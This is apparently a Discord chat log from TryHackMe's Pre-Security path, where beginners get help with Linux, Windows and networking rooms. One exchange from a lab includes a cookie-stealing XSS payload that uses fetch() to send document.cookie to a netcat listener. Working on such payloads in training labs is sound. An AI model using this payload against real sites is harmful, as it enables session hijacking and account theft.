#pre-security-legacy-path

But maybe it's my mobile cutting it off 🤷🏼‍♂️

Thanks for your answer

No worries

Is there hands on type of thing to learn beginner networking stuff, im just getting really bored and de motivated listenting to videos and reading stuff.

Packet tracer could be good.

You can build networks

https://gns3vault.com/labs
http://www.freeccnaworkbook.com/workbooks/ccna

Hi, I am stuck at a question in windows Fundamentals 1 in task 8. The question is: In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view? Can someone help me with that?

What is the issue? That's a pretty straight forward task

somewhat security related - most entry level IT help desk jobs want active directory experience, not sure if tryhackme has windows labs yet(i'm new). considering windows server costs hundreds of dollars what are the best virtual learning tools for AD, Domain controller etc? Thank you

THM has AD content and Windows content.
If you're a student, you can get free windows server.
I believe there's also evaluation editions for non commercial use

Ok, thank you. student getting free window server usually depends on the college no? I'm aware of the valuation versions those actually work well in vmware for me

Gave +1 Rep to @warm epoch

Look at Azure for Students

Lots of free stuff on that

Ahhh, cool! I see that now

Thank you!

Only 100 bucks if enrolled

i am confused, isn't that the purpose of TCP? so if one "chunk" of data is missing then it will be sent again

Weird. Mine was free.

MS academic program depends on the type of partnership with the school - it was free at my community college, but my university had a fee to enroll it

yes.... but if the connection is unreliable so you never get all the package parts that you need to assemble the package all the sent data is just garbage that can't be used

the key is good connection for TCP Then

no not a good connection... but one that is reliable enough to get all the parts to the end point

cool thx !

https://accedian.com/blog/network-packet-loss-retransmissions-and-duplicate-acknowledgements/

It's resent if packets are lost

Cc @unique zephyr

thank you 🙂

yeah shadow might have oversimplified somewhat

I think the room is wrong

¯_(ツ)_/¯

Using the word "chunk" is not great here either, makes it very unclear

yeah.... better worded explainations would help

Yup😅

ayooo

hello
I am learning Linux fundamentals 1
when i started the Attack Bus and installed the machine, the terminal loaded into root
and not as a standard user
now i am unable to do the exercises

Because you have to start the target machine (green button "start machine") and not the attackbox (blue button "start attackbox")

Hello, I am having difficulty with Linux Fundamentals part 3 task 4. I am not able to use wget command to download the file from the virtual machine. I followed the walkthrough but I cannot connect to machine with wget.

I was able to get the flag by ssh onto the machine and cat the .flag.txt file in the machine. But Why does wget not work for me?

Did you start the python server on the target machine? If yes, show a screenshot pls

oh no nvm thank you

not on target machine

boys i just finished presec pathway!

im very stoked i didnt have to use hints or writeups nearly at all and i memorized plenty of terms and information

Nice. Im just getting here from complete beginner. Time to work on this path. Looks like 44% of it was complete with the complete beginner path

Nice

Happy New Month From Here To Everyone

Yo wassup guys. Would you recommend pre-security -> complete beginner -> web-fundamental -> jr pentester -> offensive pentesting

Pre-sec => JT Pentest

oh dayum

aight

in the windows fundamentals course, what linux program is that which they show in the screenshots for RDP? is that native on kali installs?

Without looking at it because I'm lazy, is it remmina?

Yes I figured that out eventually looking through blogs about RDP on linux.

In linux fundamentals part 2
The vm box directory is not what’s expected to be. Meaning, when I spin up my machine i get access to the GUI where there’s only root’s home folder … etc

But the questions seem to refer to something different other that what’s in the contents of this machine.

I have tried tree command to scan the home folder and grep to determine if these files in the questions exist without luck

You're looking at the attackbox

You likely haven't deployed the target machine, or you need to change VM using the tabs at the bottom of the in-browser display.

If you click "Start AttackBox" then it will start the attackbox. You need to click the "Start Machine" button.

Right it says it’s the attackbox. What am I doing wrong?

^

Oh! So I should “deploy a machine” instead of attack box?

Not a machine. The machine.

Thank you! That what confused me perhaps. Attackbox vs start machine. I thought they were the same

Gave +1 Rep to @warm epoch

The attackbox is a machine you fully control, you use it to attack the targets

The targets are deployed in tasks with the Start Machine button. Their IP is shown under "Active Machine Information"

So, after I hit “start machine” top left corner. There’s this little red box that says active machine info with the ip addr of the machine etc. when trying to access it by hitting the [?] button it gives 2 options vpn or attack box. And I am back to square 1 😂

Have a read through task 2

If I access it through AttackBox. That’s where I don’t have the same file system content as the questions.

It talks you through accessing the target machine from the attackbox.

You absolutely need to read the task

Sure. Perhaps I missed sth.

Thank you though

For anyone doing the linux room rn, when it gives you the extra resource for regex, take it. Im doing some CTFs on basic linux usage and it is really useful for grepping out flags from large text files

Thank you. I now get it. 👍

Gave +1 Rep to @warm epoch

What would be a good path for someone like me who does not seek a job in this space but really curious to discover and learn about the CS dangers/benefits?

I feel like for something as simple as cybersec dangers and benifits it would even be necessary to take a path. Maybe a few youtube videos or introductory course ought to do the trick

Right. But that would just give you the theoretical part of it. And you’d never be able to know how hard/easy for attacking you/your resources. That’s why I signed up for this to understand what kind of methodologies they use, tricks, volun. Etc. of course that I believe is only the tip of the iceberg.

Oh well alright i gotchu

I'm having trouble with linux fundamentals part 3 task 4. I am running the python server on the ssh they gave me and using the wget command on a different empty terminal but I'm getting an "code 404" error in both terminals that "file doesn't exist". Why is this happening?

could u send a print screen?

I am having difficulty in entering linux fundamentals 1 lab. the ssh is asking for public key.can anyone help?

1 has in-browser access, you're not meant to SSH in?

2 uses SSH.

Fixed, thank you!

Gave +1 Rep to @ornate rover

For linux fundamentals 3 where is the cron job located?

nevermind lol

I'm going through pre-security right now. Loving it.

helo peeps having asn issue on the 1st linux room

trying to play around with the >> & > commands with the test room and i keep getting errors?

keeps saying bash:folder3 is a directory

after trying out echo hello >> folder3

Yeah, you can't write to a directory as if it was a file.

understood. so what can i do in this box to play with the commands?

just want to try stuff out in a simple way

oh

Don't write to a directory - think about how it works

could i do echo hello >> note.txt

A folder contains files, the folder isn't a file

You could, and it would create note.txt if it didn't exist

but if it did it would add to it right?

it would become
hello world
hello

It would append to the end of the file, yeah. >> means add, > means overwrite

cool i figured it out!

thanks!

Correct, but you can't write to it like a file.

in the attack box in lunix 2 how do i get to the root folders? like var,temp,etc

i dont think the task tells me how to get there??

aha

found it

Are you meant to?
What have you tried?

its part of thw tasks to navigate to them

was not putting the correct ///

https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard

thanks!

also save the online man page

feel like that will be used a lot

l can't log in to lab on Linux fundamentals 2. it is asking for public key. How do I go about it

Thanks. I am referring to linux fundamentals 2. each time I use the ssh. it is asking for public key.

Gave +1 Rep to @warm epoch

Could you show a screenshot of that pls? You will have to verify first in order to be able to send screenshots

!docs verify

Thanks. it is perfect now

Gave +1 Rep to @soft snow

Hi, I'm stuck on Linux Fundamentals Part 3 Task 4

here's a screen shot

You'll need to verify with the bot in order to send images here

Please follow the steps in this link here in order to do so

I can't seem to find this hidden file .flag.txt anywhere. Any ideas?

@wide scaffold looks like I'm having the same issue you had. Did you get a resolution to this?

Restart the machine and try again

ok thanks @ornate rover will try that!

Gave +1 Rep to @ornate rover

I suspect you're in the wrong directory

Before restarting, cd ~ and run ls -a

thanks @warm epoch will try that too!

I can see the hidden file now @warm epoch which is great but still having trouble downloading to the AttackBox. I'm guessing it's the location I'm referencing in the url?

You changed directory before running the http server

Why did you do that?

I ran it from the home directory per the instructions

The instructions were confusing, I made the same mistake. Run it from the main directory without adding /home.

Go to /tryhackme directory

There is a very big difference between "the /home directory" and "your home directory"

Type cd tryhackme, to go for the correct directory

The leading slash means that will not work

oh I gotcha

Why not? I start the machine and it’s works

Linux file paths matter.

A leading slash on the paths means it's relative to the root directory, which is /

there is no /tryhackme on the box

Yeah, u are right! I’m just type the entire path… since he was in the home directory he just had to type cd tryhackme

thanks so much @ornate rover @warm epoch @umbral remnant !! Finally got it to work

Gave +1 Rep to @ornate rover

/tryhackme is not the entire path, again that would mean the directory tryhackme immediately under the root directory /

Yes I know! What I meant was that when I started the machine to browse the directories I went to the root and simply typed /home/tryhackme to navigate to the main directory of the exercise, as he was in /home I told him to go to /tryhackme but in this case it was so he just typed cd tryhackme instead as you said. I was the one who had to type the whole path because i was in the root

go to /tryhackme that's the problem. /tryhackme does not exist.

if he had just typed cd # it would have solved it too

If you want to specify that it's a directory, you'd usually add a slash at the end, tryhackme/

Yeah I know, I corrected this

I found mistakes explanation in Web Works - DNS in details room

@cedar flame #room-bugs

i'm doing my best to understand Network Fundamentals but i still feel lost, should i move on cuz they will start to make sense in the future ? or try harder?

I personally would try harder, google the stuff you have a hard time with

thanks I will

Gave +1 Rep to @soft snow

After ssh the Linux Machine from AttackBox, Passwod is getting denied even though both Username and Entered password correct that is tryhackme. Any suggestions ?

Which machine are you trying to ssh into?

For Learn the Linux Fundamentals Part 3 I am trying to access Active Machine for AttackBox

Permission Denied

what task are you on, and did you try terminating the machine and starting it again?

And also verify your discord account with the discord bot so you could post screenshots if needed

!docs verify

Yes I did

Thanks for this

what task are you on

What is the machine ip?

Deploy Your Linux Machine for Learn the Linux Fundamentals Part 3

10.10.142.182

Is Machine IP

Well you need to SSH into the machine what command are you using?

ssh 10.10.142.182@rain berry

Wrong way

Tryhackme@10.10.142.182

Ok Thanks

It worked Thank you very much @tight ingot .

Gave +1 Rep to @tight ingot

No problem! Glad you got it, Happy Hacking!

kinda stuck on the windows fundamentals part 1?

cant seem to get an answer to the notifcations question or "what selection hides/disables" the search box

Well the answer is kind of in the question... Don't you have windows or are you using just linux?

windows sure

Well why don't you try to hide the search box then? 😄

And see what the options is called

i see

i assumed i was expected to answer using the text or the attackbox

Sometimes you just have to search for it, maybe try to replicate the steps or search online, get used to it future tasks ask for deeper research than what the question or task offers.

we got it we there

another one

im unsure what it means when it asks "what is the account status?"

is it asking the status of the guest profile or a defination of the meaning

nevermind

got it

Over 60 percent finished with this pathway. I lurk in the group often without saying anything. The few times I was in here it just kept me motivated to keep going. Thanks Everyone!

Keep chipping away @ocean totem

Hi, I'm on the biography maker in the Bash Scrypting module and I get stuck here:
"Maybe try to make a small biography generator, where you take the name, age and job as parameters. Store them in a variable and display them on the screen in a sentence".
Here's what I tried but it doesn't work:

#!/bin/bash
biography=$1
biography=$2
biography=$3
echo "Enter your name, age and occupation".
read $biography
echo "Your name is $1, your age is $2 and your job is $3".

seems like you are making the same variable name biography equal $1, $2, $3 meaning it only keeps the last value

@potent wedge is that right? :

#!/bin/bash
biography=$#
echo "Your name is $1, your age is $2 and yor job is $3"

basicly yes

but also no

now you are also not using the biography variable

technically you were not before either

how can I echo "Enter your name, age and job" before?

#!/bin/bash
echo "enter your name."
read name
echo "enter your age."
read age
echo "enter your job."
read job
echo "your name is $name, your age is $age and your job is $job"

is how shadow would do it

Ok but I have to store the parameters name, age and job in one variable.

ah

nearly finished pre security, good bye forever

or you could come back here and help others to help you remember

fine

shadow makes a possibly good point

hey, i need help with the How websites work JavaScript Section

pls

sure what is your problem

i can't figure out the script 😅

Click the "View Site" button on this task. On the right-hand side, add JavaScript that changes the demo element's content to "Hack the Planet"```

i tried stuff with the code

document.getElementById("demo").innerHTML = "Hack the Planet";

Perhaps innerHTML isn't the right way?

i copied it from the examples above the questions 😅 i do not know JS

nope that is how shadow did it too and it should work

humm

innerHTML just makes me cringe internally because it's often why XSS vulns happen

what is the tag format?

<script>document.getElementById("demo").innerHTML = "Hack the Planet";
</script>```

<!DOCTYPE html>
<html>
    <head>
        <title>TryHackMe Editor</title>
    </head>
    <body>
        <div id="demo">Hi there!</div>
        <script type="text/javascript">
            document.getElementById("demo").innerHTML = "Hack the Planet";
        </script>
    </body>
</html>
``` is the entire code shadow used to get the answer by then clicking the render option

hu

so i do not need another tag xD

nopes

so i did right, almost at least XD

i see why it didnt look right
because there is no color to the text it is black font so i thought it is not recognized

i managed how website works and understood nothing in the last tasks 😂

anyone doing Nmap or wireshark DM me

hey i just end the pre security and i'm really confused what i should learn , i need a path which i can't understand . Anyone here pls help me!!

After pre-security, I joined junior pentester. I'm really enjoying it.

I went pre-security into complete beginner 😅

😎

https://tenor.com/view/leonardo-di-caprio-wolf-of-wall-street-good-job-applause-great-work-gif-16467434

do i still get the certificate when i complete the path without completing the rooms that i need to pay for?

:-(

so I can only get any of the certificates by subscribing?

ok, but thanks for your reply :)

😇

Hello there, I've just started on THM but something is bothering me in the Packets & Frames Room#1. Think of this as putting an envelope within an envelope and sending it away. The first envelope will be the packet that you mail, but once it is opened, the envelope within still exists and contains data (this is a frame) I find this pretty misleading as it can mean that a frame is contained inside a packet. Also, the terminating () could imply the frame represents the data contained. For a beginner path it should avoid any misleadings on this basic concept. Please do tell me if I am the only one worried about that 😅

Just had the same reaction 😄

Oh thanks !

Can someone suggest me in what ordner i should complete the 7 learning Paths?

Ok thx :)

Any reason why jr pentester > offensive pentestinhg?

I’m currently following pre security and I’m hesitating between jr pentester and offensive

Ah

Okay

And complete beginner is a waste of time now?

Okay thank you

Ho wait

Wrong room 😄

That path is really fun to do and it's teaching you the fundamentals, without the fundamentals it will get harder for you to understand some stuffs in the path you're doing at some point, and #878393611929129000 is teaching you how to use tools like nmap, burp, and is preparing you with some enum methods for some services that you can encounter irl scenarios, also there is a module that is teaching you how to crack passwords etc

I am doing the complete beginner path at the moment, and enjoying it very much.

is it okay to start offensive pentesting after pre-security or should i start jr penetration tester after pre-security need suggestions🙂

Ok

Hi there, when would you recommend doing the comptia+ path? In about a month I will have the right to have a course up to €1000 for free. I am really wondering what the best option would be. I am very new. Still at pre security path at linux fundamentals part 2. Thanks in advance

Gave +1 Rep to @trail flame

Yeah im between JR pentester and complete beginner

Allright then JR pentester it is. Appreciate the help

hello anyone active in the chat right now

@narrow blaze hi! i'm getting online now, i'll be hanging out for a while if you wanna hop in chat 😄

@proud rose I’m just now seeing this mate

hi all

👍

Hey, I have a question;

Are system administrators able to choose between protocols like UDP/TCP or is that chosen automatically by the server/computer?

As far as I know that's determined by the application. If it needs a reliable connection it will use TCP, if it needs a fast connection where it's not an issue if a packet gets lost, it's using UDP

Alright, thanks!

So many smart people in here

Anyone else finding this kinda intimidating?

What's intimidating ?

remembering it all

Well, I wouldn't call it intimidating rather then overwhelming at the beginning.
So yes, it can be overwhelming when you start out with it :=)

I suppose. pentesting was my dream as a kid but I kinda realized its not for me, but its def something I want to look into

and ngl that kind of hurts

but hell, im learning

lmao sorry for the info dump

I wouldn't give up before you even tried it for a while.
So as I said, it's normal that it is overwhelming at the beginning, but you get used to it, so don't set yourself the mindset that you can't become a pentester because of that fact.

even if you don't remember things, you can google them. Knowing how to search things it's a big advantage in this domain

start taking notes of this

and then refer to it when u start going through more advance stuff or real hecking

u will also start to connect the dots

It's just that I feel so dumb reading through all of the course material, and still not knowing entirely how to run the commands

That happens in the beginning and you will learn those where it automatically will come to your fingers

Yeah and you have a point, but for example I couldn't get past the linux fundamentals without walkthrough vids, i feel like im cheating

Going through the motions can help things make sense, or you can experiment and do the 'wrong' thing sometimes and learn something by observing what happens
I think it's really about just spending time with it, absorbing the nuances, as long as you're always trying to understand something about it or taking it in actively/critically, you should come out the other side with improved understanding

I'm on the part on windows fundamentals 1 and trying to remote access to standard user in TASK6, How do I connect?

Aren't you just trying to list the account?

iirc you don't actually have to change login.

TASK7 sorry, Log in as the standard user and try to install this program. To do this, you can remote desktop into the machine as the standard user account.

Note: You have the username and password for the standard user. It's visible in lusrmgr.msc.

UAC?

yeah it isn't part of the question it is in the main section of the page

Are the paid courses on tryhackme compulsory knowledge?

ex: OSI model, Packets and frames etc

It's very good to learn about these, but you can learn about them elsewhere

Linux fundamentals part 3, task 8-getting IP for site visitor???

I cd into /var/log on my deployable machine but don’t see an apache2 directory, so how can I answer that question?

Are you on the attackbox or the target machine?

I tried to ssh into target machine with no luck

Well that is a pre-requisite.

I restarted my attack box and successfully ssh’d into target machine and now see apache2 dir. Not sure why it didn’t work the first time.

Hi...

Dear i need support regarding XSS in junior penetrating tester

in task 8 i need to grab Cookie using NC but unfortunately its not grabing the cookie someone please explain me the reason behind it

nc -nlvp 9001 this is the command i m using

</textarea><script>fetch('http://10.10.254.129:9001cookie=' + btoa(document.cookie) );</script>

thats the script as my machine ip is 10.10.254.129

Dont use the target machine ip

Use your tun0

tun0?

ip a s

tun0 is your THM ip.

u mean my Attackbox ip right ?

How do you know that's not the attackbox IP ?

the machine i m using to access the website

Good point.

All they said was "machine ip"

i m using my attack box ip

To me Machine ip = target ip

Yes.

my bad

No, it's not.

It's mine.

i m using attackbox ip

Listening on [0.0.0.0] (family 0, port 9001)

</textarea><script>fetch('http://10.10.254.129/:9001cookie=' + btoa(document.cookie) );</script>

this is the payload i , using

can u please rectify the mistake ?

/ i just write while typing here

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

this is in task text

</textarea><script>fetch('http://10.10.232.131:9001?cookie=' + btoa(document.cookie) );</script>

this is the one i m using

i m not getting anything

got it

i guess the problem was i was using thmlabs.com instead of target machine ip

thank u soo much for the help

noo... ip was correct i tried several times'

😆

Boutta start Part 1 of the Linux Fundamentals

If i have any questions I'll reach out

and shadow and others will be here and answer

I don't understand the grep command that well

Trying to use it on terminal (on mac) and can't get a hang of it

it checks the contents of a text file and if it finds what you gave it as a search term it prints out that line to the screen

Ah I think I get it

Like looking for key terms in whatever file that term may be in?

yuups

it gets a bit tricky when you use it to do recursive searches through multiple files though but that is extra fluff to learn later

It’s also really useful to search inside command outputs using the pipe symbol

Thank you

Do you recommend using the linux machines given to us on the website? I've been going back and forth and applying what I've learned on my mac terminal.

Oh wait nvm

I forgot we gotta use them to answer the questions lol

I actually do have a virtual machine installed

I just haven't set it up yet

I cannot when will the crontab be deployed on my machine for Linux fundamentals part3

I am struggling with trying to copy file from smb: .ssh to local machine. Please help.

Do you want to copy file from smb to local machine or ssh to local machine??

Hi ayushh, Sorry for lack of clarity. This is the question: smb:.ssh>id_rsa and id_rsa.pub
move to root@kali:\
Question 8: Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]". Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. I'm lost. I know how to copy and move within the same directory, but not from smb/ssh to root kali. Help is greatly appreciated.

So what part you exactly struggling with? The right command in smb client ?

I see now. I used the correct command it put the files where I needed them. I don't think I used get prior. Now I'm off to change the permissions. Don't know what I'm doing, but I'm going to give it a shot!

I have everything except how to get the flag. Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. I am stuck again.

You have to explain it more detailed what exactly you are stuck on.
Even better to verify in order to be able to send screenshots, and then send one.

!docs verify

Am I supposed to get a different answer when using the command whoami in the Linux Fundamentals Part 1/ Task 4?

hint says use whoami, the answer is expecting a longer string, but when i run whoami, the output is root

You're currently using the attackbox, not the machine for the room

I ended up terminating it and redoing the step and I got it working now, thanks!

anyone using telegram here ?/'\

This channel is for the Pre Seucrity Pathway on tryhackme, #general would be better

am new here !

Have a read through #start-here and the channel topic with each channel

PreSec isn't too difficult so far

I think once I get through PreSec I should do complete beginner right?

I'm gonna be working through a lot of this stuff

this stuff is fun

So looking for minimal guidance. Linux Fundies part 3 when inputting the python3 -m http.server command it seems to boot me out of user? So I can’t execute wget to get the flag? I say minimal guidance because I just need a nudge in the right direction I still want to do things myself. That’s why I’m not just YouTubing a solution lol

Can you share the screenshot?

hi the ctrl+x is not working in THM linux fundamentals room 3

hold on a sec let me try something

I fixed it

never mind

Thank you. I figured out that running in background works as well so I figured out how to do that. Then had to figure out how to kill the program. Spoiler: idk why ctrl+c only sesulted in ^C being printed so had to use “kill” command then found out that “kill -15” allows for clean up and “SIGTERM” (which is supposed to do the same) doesn’t work. Am I missing a ton? I’m finding different ways to do things but THM is teaching differently so am I missing the lesson?

Gave +1 Rep to @trail flame

It probably only resulted in that because you had the python server running in the background. So you would have to foreground the python server first and then use ctrl+c
Beside that, as you said "running in the background works as well" sounds to me that you are using wget in the same terminal as you used to start the python server, which means you download the file from the target machine to the target machine, which makes no sense

Ok gonna have to play with it more. When I fg python I can’t use commands but can’t remember if I tried CTRL+c. Wanna say yes but will attempt again.

Also I thought the purpose was we didn’t have permission to view it so using wget made essentially a copy (.1) of the file that we could then open and retrieve the flag? I mean that’s how it worked anyway

No, the purpose was to download the file from the target machine to your attacking machine, since transferring files between these 2 types of machines is something you will need quite often

E.g transferring linpeas or any other script to your target machine

Geez I’m gonna have to redo it. So python running on the target and don’t ssh into target on new terminal and wget from there?

Right

Well at least I understand the concept. Better late then never. When I get home will redo that and I’ll @ you when I’m successful lol appreciate all the help you and @trail flame . Would have gone all through thm thinking wrong was right.

@soft snow did it. The ctrl+c worked also. And I now understand the “why” as well so thank you and @trail flame again!

Gave +1 Rep to @soft snow

• @trail flame

Gave +1 Rep to @trail flame

Please do junior pentester instead of complete beginner first... Complete beginner is depractated

If you are concious about your online privacy, be careful of posting screenshots that could contain personally identifiable information

shadow assumed if they decided to share it they probably already regard it as okay for their own privacy

Oh really? Ok will do thank you

Gave +1 Rep to @potent wedge

I figured my name was ok but o do see your point thank you

+rep @inner flax

Gave +1 Rep to @inner flax

no problem just thought the knowledge of that would be helpful

Also, deprecated meaning no longer maintained or out of date or…?

in this case both

guys i need help

when i open terminal all time its shows there is a back space

like this

might be your prompt being configured to have a space at the start of it

how i can make it like this when i open terminal all time

also this is not really related to this path and should therefor probably go in #infosec-general

k

Sorry I know I’m asking you a lot of questions. Do you suggest Jr Pentester before or instead of Intro to Cyber as well?

nah do intro to cyber first if you feel like it

it will point you into what you might want to do in this field

Cool thank you 🙏🏻

Ιntro to Cyber looks better to start and gain some basic knowledge

Haven't been able to find the cron job for linux fundamentals 3, tried every relevant command or directory I can find on google. Can anyone direct me?

cat /etc/crontab or crontab -e

also are you on the target machine instead of the attackbox

I've tried both those and I'm on the target machine

Tried reboot, reboots etc

every combination of monthly, weekly etc and nothing has worked

oh you are wondering what the correct answer is???

while you have viewd the crontab file???

Well I thought it started at reboot as that was the only job but it was wrong

yes and that is exactly what it does

the answer needs @ symbol before the word to work though

🤦‍♀️

I thought it was only letters because of the *s in the textbox

Thank you

@ counts as a letter according to those

no problem

because some of the previous ones showed where the symbols were, it was confusing (Such as *{...)

ah yeah {} . and spaces get shown as other chars then * in answers

Anyway, thanks again!

good luck and keep going

It was rough at times, but I finished!

Slowly working through this path

In the learning path "Jr Penetration Tester" -> "Introduction to Web hacking" -> "Walking an application" the URL "https://LAB_WEB_URL.p.thmlabs.com" is not accessible. The error i get is "504 gateway timeout". Please help me getting this URL working plus

you have to start the machines with the big green start button first, wait for that url to show an ip in it and then go to it

I did start the machine, and i see the IP. What should we do with the IP of the VM?

I am able to see the Ubuntu machine and the exercise mentions that "Start the virtual machine on this task, wait 2 minutes, and visit the following URL: https://LAB_WEB_URL.p.thmlabs.com (this URL will update 2 minutes from when you start the machine)". I tried opening this URL in the Ubuntu Machine using firefox. And i get the error "504 gateway timeout"

Its working now, after rebooting the VM a couple of times.

Why am I seeing a section from Introduction to Cyber Security in the Pre Security path now?

because the path was updated with newer content?

That's what I thought at first, but it's the same content in both paths now

idk, they might merge stuff later 🤷‍♂️

Idk maybe. To me it seems more like something got messed up. There was a different room there before, that I already finished, but it's gone now.

Strange I got those in Junior Pentesting

Oh yeah, it's there now too. Odd.

¯_(ツ)_/¯

Probably just lessons used for the same path.

After pre security whats the next course I should take?

Basically whatever you like, but Jr. Pentester Path might be recommended

If you want shadows recommendations it is in this order
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#pentest-plus-path
#web-fundamentals-path
#offensive-pentesting-path
#791764435991658556

Just curious so should I avoid the complete beginner course?

Your choice but it is outdated and marked for removal eventually... If you wanna do it, it fits in after junior pentester

Ok thanks for the help

Gave +1 Rep to @potent wedge

you're welcome

Thanks for this! I'm halfway through the "Complete Beginner", should i jump to the jr pentest path? I've already done Pre Sec

Gave +1 Rep to @potent wedge

well if you are halway done you might as well complete it and then go to junior pentester

Burp Suite: The Basics
Task 9:
Read through the options in the right-click menu.

There is one particularly useful option that allows you to intercept and modify the response to your request.

What is this option?

Note: The option is in a dropdown sub-menu.

I don't find the option I don't knoww were to search

Can I have a hint or help ?

I'm in the Linux Fundamentals Room 3.

I'm having trouble getting the python3 -m http.server command to work. Specifically, when I run the command, my attack machine looks like the one in the first pic.

I don't understand how they got to a prompt that reads # wget http(interruptedLink)://127.0.0.1:8000/file with the pound sign.

When I try to run the code, it just hangs and doesn't show any activity. Specifically, I'll ssh into the target, then run the python3 httpserver, then it will sit there looking like the top pic. When I type in wget http(interruptedLink)://10.10.89.176:8000/.flag.txt I should be able to get the file and complete the task, but I'm not getting anything back. I know there's a fundamental piece of knowledge that I'm missing. Any ideas?

I believe that it is not hanging...I should have said "it looks like/as if..."
So the notion is to open another terminal and run the wget command from there? I'll try that. Thank you!

Gave +1 Rep to @trail flame

Yes, maybe a sentence could be written to instruct the student to open a new terminal. Lemme test this suggestion first, and I might send feedback to thm through another channel

Thank you! That worked.

1. I used ssh to get into the target, then opened python3 http...
2. (This is the fundamental part I was missing) Then I opened a new terminal window and used ssh again to get the second shell into the target,
3. Then ran the wget command to retrieve the file.
4. Then I ran cat .flag.txt to read the file and get the answer.
5. THen for fun I typed 'exit' a bunch of times.

Thanks again!

Gave +1 Rep to @trail flame

Cool, thank you for sharing that. I'll try it that way and see what happens.

I see the difference now. The first way I did it (adding another ssh) 'went into' the target to access the file, whereas the intended way connected and saw the file from the attacking machine. I think I get it now. I'm glad you said that, because testing the task both ways was very insightful!

I just figured out that the videos provide a complete walk-though of all the lessons in the room.

I had not been watching the videos, just reading the text and doing the exercises.

This will help out immensely next time I get stuck!

Thank you again!

Gave +1 Rep to @trail flame

I think that's because I'm 46 and I don't know how to write 'internet-speak' and without punctuation, hahaha!

what are the layers for in osi and tcp ip

so i dont understand it

when transferring data

so the data is going through the layers ?

layer 7 to layer 6 to layer 5...

iirc the osi model and the tcp/ip model similar but different models

ip corresponds to the 3rd layer (network) while tcp corresponds to the 4th layer (transport) (edited)

The different layers are just different representations of what is happening. The first layer is a very zoomed in version (application) while you further and further zoom out until you end up at the physical layer which is just the network cable itself

so the data goes through all layers at the same time!

Vice versa

ah woopsie my bad 😅

Routers are layer 3 devcies, which is a good way to remember it

Routers 3, switches 2, cables 1

That makes it easier to remember, thanks!

If we spun it further, could you say: TCP/UDP connections 4, Ports 5, SSH/FTP 6 and Browserapp 7 ?

No

Ports are part of 4

SSH is a tricky one because of some of it's networking features, but FTP and HTTP are both pretty clealy the same

Half the time you won't care above layer 4 anyway

The whole point of the layer structure is that you don't have to worry about the layers above or below too much

Hmm I see

So 6 and 7 would already be stuff that is not really related to networking itself

I mean?

Makes sense 😅

Why is it a disadvantage of UDP that it is flexible to software developers? Flexibility sound like a good thing. 🤔

I guess flexible software also means easily breakable which would be a disadvantage if you look at it from a security perspective (introduction of exploitable bugs)

agreed tho.. flexible does sound rather positive 😂

‘-‘

no standardistation and therefor lots of different implementations that can cause conflicts and make it hard to debug when it comes to how udp gets used

hi, i need help with NFS … i am struggling there and can not move on 🥲

Ask

Hey guys!
Was doing the network chapter about the OSI MODEL and sometime it is not always clear to me WHAT is used to switch from a layer to another.

For example: the transformation from the Application layer, to the Presentation layer, will usually be made by the used application.

Or the transformation from the network layer, to the data link layer is usually made by the router (if I am correct)

Would you guys have a list of all the actors of those "transformations", and which transformation they operate EXACTLY?
From the apps, to OS's, routers, servers, etc ...

Thx 🙂

Don't think of it as going between layers

Think of them as distinct layers

Your structure like an HTTP request will exist in a TCP packet, which will eventually exist on the wire as one or more ethernet frames

The whole idea of dividing it into layers is so that you don't care what the layer above or below is doing as long as it's doing it's job.

You being someone implementing or troubleshooting something

Hey there, thx for your answer! 🙂
I understand the purpose of adding or removing the layer to focus only on what data is useful to you.

However, I'd still want to have an idea of who/what is adding each layer, when sending data bits. I think it would just help me get a better idea of how things work 🙂

Gave +1 Rep to @warm epoch

I'd recommend searching for examples of each layer then

lol okay 🥲
I was hoping for some beautiful diagram 🤩

but i did not find it lol

hey guys I about to start pre-security today. if anyone's interested in being learning buddies feel to message me

hey, I'm interested

a program basically sends some application data to other programs or to the operating system. more data gets added to the front before being sent over physical media. the recipient unpacks it until it gets the application data and sends it to the relevant app. you could think about which osi layers the headers correspond to but there are ways of sending data where the headers aren't ordered so that they look like the osi model

the operating system has a tcp/ip stack to process these layers then sends that IP packet to the, e.g., network card driver

For the Packets & Frames room, I don't quite understand the 1st sentence:

Packets and frames are small pieces of data that, when forming together, make a larger piece of information or message. However, they are two different things in the OSI model. A frame is at layer 2 - the data link layer, meaning there is no such information as IP addresses. Think of this as putting an envelope within an envelope and sending it away. The first envelope will be the packet that you mail, but once it is opened, the envelope within still exists and contains data (this is a frame).

Especially this sentence:
"A frame is at layer 2 - the data link layer, meaning there is no such information as IP addresses"

From my understanding, encapsulation is going from Layer 7 ---> 1.

So Layer 2 (frame) should have IP header as well

frames have a mac address

eg. a web request

the en/decapsulation just deals with this outer header

Yeah, so layer 2 has all these information. Mac header, IP HEADER, tcp header,data.
So Layer 2 has IP address as well right? I mean the further encapsulated down the layer (Layer 7 --> 1). Level 1 has the most information.

"layer 2" referse to this mac header

so it only has the mac address (and some other stuff)

all the data including and beyond the ip header is called a "packet"

I found this online, and it seems more info at the bottom layers

it is very confusing how its diagrammed and how they name things

the diagram represents them adding or removing headers

the whole message is the bottom one

each layer has a separate header that gets added

Yeah Layer 7 ----> 1 (Encapsulation) adding header to the data
Layer 1 ---> 7 (Decapsulation) removing header from the data.

yup

So back to this sentence from the room:
""A frame is at layer 2 - the data link layer, meaning there is no such information as IP addresses"

It's false right?

does this help?

it does have IP address in layer 2

and it has everything in layer 1

mac has mac address

ip has ip address

two separate addresses in two separate headers

Yes, even from your diagram. I can clearly see "IP header" in data link layer

it has both mac and ip addresses

right ok

i understand the confusion

Stated that no IP address information on layer 2. Which is wrong...

the data sent to something looking at the layer 2 will also contain more data with the ip address

but a layer 2 device only looks at the layer 2 header and passes everything else on

so it doesn't see the ip address

only the mac address (although it theoretically could look at the ip address)

oh so I guess we have to look from the device point of view? The layer 2 device (e.g: a switch) can't see the ip address even though it's there, it can only see the mac address. Am I right?

yes

it only looks at the layer 2 header and ignores everything else

Ok, so I have to focus on the first header only, then I think it'll make sense then

the idea is that the headers get added on one by one or taken off and looked at one by one where the header usually corresponds to the layer in some model

Ok thanks, I think I start to get it

nice

